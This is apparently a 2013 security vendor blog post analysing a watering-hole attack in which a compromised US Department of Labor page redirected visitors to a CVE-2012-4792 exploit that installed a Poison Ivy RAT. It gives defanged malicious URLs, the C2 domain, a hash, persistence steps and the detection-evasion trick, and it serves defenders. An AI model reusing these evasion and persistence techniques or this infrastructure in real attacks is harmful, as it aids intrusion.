Sophos acquires machine learning visionary Invincea.

Part 1 – K.I.A. – US Dept. Labor Website Pushing Poison Ivy – CVE-2012-4792

May 1, 2013

UPDATED 11:30 am 5.4.13 – Correction – Microsoft confirms exploit is a zero-day as written up in Part 2

UPDATED 8:50 am 5.2.13 – Correction regarding Google black-holing of domain – details in analysis below

UPDATED 2:47 pm 5.1.13 – Now available – IOC file – Download Here!

On the evening of Tuesday, April 30th 2013, we received a tip that a site hosted by the United States Department of Labor (USDOL) had been compromised and was hosting malicious code. The site has since been fixed and law enforcement is investigating.

In addition, AlienVault also has a write-up of the same exploit here.

As many security companies, including Websense, have recently noted, the vast majority of web-based driveby exploits are occurring from legitimate websites that are compromised with the specific intention to exploit the website visitors. Watering hole attacks gained notoriety over the last year as a method of infecting specific targets by compromising websites they are likely to visit.

In this case one US Federal department website, the Department of Labor, was compromised in order to target what are believed to be employees of US Dept of Energy that work in nuclear weapons programs. As reported by NextGov, the the Dept of Labor’s web pages  that were hijacked in this compromise — the “Site Exposure Matrices”– lists “nuclear-related illnesses linked to Energy facilities  and toxicity levels at each location that might have sickened employees developing atomic weapons”.  In other words, this attack bears the hallmarks of a classic watering hole attack targeting certain employees working in nuclear weapons for the Dept of Energy by compromising a website at the Dept of Labor they are likely to visit.

One highly effective way of getting on to an enterprise network is to infect its website where its employees are likely to visit. Naturally there will be collateral damage to other visitors to the website. In this case, the compromise was to simply insert a re-direct to another malicious website within a Javascript that runs on the DoL website. The re-directed website exploits a well-known vulnerability (CVE-2012-4792) in older versions of Internet Explorer v6 – v8 running on Windows XP machines. This profile fits the enterprise user machine profile typical of large enterprise and government agencies. The exploit was used to implant a variant of Poison Ivy remote access Trojan (RAT) mutated to change the PE magic number to evade network signatures. In the following continuation of our KIA series, Invincea security consultant Eddie Mitchell breaks down the exploit and how Invincea users are protected from this attack.

Armed with an Invincea protected browser (IE8, Windows XP 32-bit), we decided to investigate further.  Upon landing on the affected page, it only took a moment before we received the all too familiar alert notification from Invincea that an infection had been detected:

Image 1
Drilling into the Details link, we can observe the real-time activity of the captured malware inside the Invincea virtual container:


Image 2















As we can plainly see, a suspect executable has been dropped onto the virtual file system (conime.exe) and launched as a process.  Furthermore, we observe that network listeners have been opened as well as outbound network communications.  To obtain more forensic data related to this mock infection, we first click Restore to purge the virtual container of all changes and pivot to the Threat Data Server for more detail:



Image 3














Once we have located the appropriate infection entry as shown above, we can quickly see the total number of virtual system changes recorded as the malware was allowed to run inside the container with breakdowns on number of executables written, processes launched and network connections opened.  In this case, 31 total changes were recorded with 2 distinct executable drops, 3 process launches and 3 network connections opened.  We can also rapidly determine that there are two web redirects present on the main index page associated with www[.]sem[.]dol[.]gov.  These redirects obviously lead to content hosted at dol[.]ns01[.]us which lead to the infection.  Next, we’ll select the Timeline tab to get more detail on the infection chain of events:


Image 4In the screen capture above, we can see that shortly after the browser was redirected to the content hosted at dol[.]ns01[.]us, a file previously downloaded to the browser cache is launched as a process.  We can also see the MD5Sum of the offending process listed in the Event Properties window above.

Next, we can see that a network listener is opened on port 443 and several steps are taken to maintain persistence on the host.  Reg.exe is launched from Windowssystem32 in order to configure an autorun in the registry and the malware copies itself to a more permanent location in the user’s %appdata% directory as “conime.exe”:


Image 5


Auto-run entry details:


Image 6









UPDATED 8:50 a.m. 5.2.13 –

Next, the malware opens additional network listeners on port 53 and 8080 as well as attempts to contact its command and control (C2) server for instructions.  The C2 domain associated with this sample is microsoftupdate[.]ns1[.]name which resolved to (Google) at the time of the original analysis.  The domain is currently resolving to (Xerox Corporation) which may indicate that the attackers are attempting to avoid attribution efforts by the security research community.

During the initial C2 contact, the client attempts to send an encrypted payload of exactly 256 bytes to the C2 server over port 443 as seen below:

Image 8
















This behavior is highly consistent with the Poison Ivy RAT as previously described by Gal Badishi of Cyvera in this blog posting.

If we go back to the Processes tab in our Invincea threat analyzer, we can perform a hash check on our malware:


Image 9














The results indicate that this Poison Ivy sample has an extremely low antivirus detection ratio (2/46):


Image 10
















Now, let’s backtrack and review the infection chain of events.

The main index page of www[.]sem[.]dol[.]gov contains an embedded script:


Image 11













If we examine the contents of textsize.js, we can see that the DOM createElement() method is used to write a script tag on the page pointing to hxxp://dol[.]ns01[.]us:8081/web/xss.php as well as an iframe leading to hxxp://dol[.]ns01[.]us:8081/update/index.php:


Image 12


The contents of xss.php include javascript functions to fingerprint vulnerable browser plugins as well as perform identification of popular endpoint security solutions that may be installed.  After completing the checks, the information is sent via an HTTP POST operation to hxxp://dol[.]ns01[.]us:8081/web/js.php as seen below:


Image 13















index.php from our iframe above is where the code to exploit the browser lies:


Image 14













Above, we can see that the javascript checks that the browser language is English and that the operating system is Windows XP based on the User-Agent string.  If these conditions are met, execution is passed to the helo() function contained in a Base64 encoded blob.  You can also notice above that “bookmark.png” (our malware payload) is downloaded into the browser cache.  Once the browser is successfully exploited, the shellcode executes the malware payload.


The following screenshot illustrates the malware download (bookmark.png – md5: a449fdcc2e15655c9f720247646913e4).  Note that the PE magic number has been altered to avoid network detection signatures that rely on the presence of “MZ”:


Image 15

It is important to note that most websites are vulnerable to exploit. As a result, exploiting legitimate websites have become a common vector for penetrating enterprise networks and individual machines. The Department of Labor is no exception. Their website was compromised to host a re-direct to a malicious website. The target of this attack appears to be employees of the Dept of Energy that likely work in nuclear weapons research. In addition, AlienVault is reporting that this attack has indicators of compromise that link to the DeepPanda Chinese APT group. This compromise shows that watering hole attacks continue to be employed by advanced threat using exploits customized to their target profile.  The malicious website re-direct exploits an older vulnerability in Internet Explorer and Windows XP machines that fit the typical configuration of enterprise user machines. Invincea users are protected against this attack as they are against other web-based drive-by and spear-phishing attacks.

Please contact Invincea  today to schedule a demo.

You may also be interested in...

Ransomware’s Stronghold on Healthcare

read more

X by Invincea: HIPAA and HITRUST Compliance

read more

5 Questions to Ask About Machine Learning

read more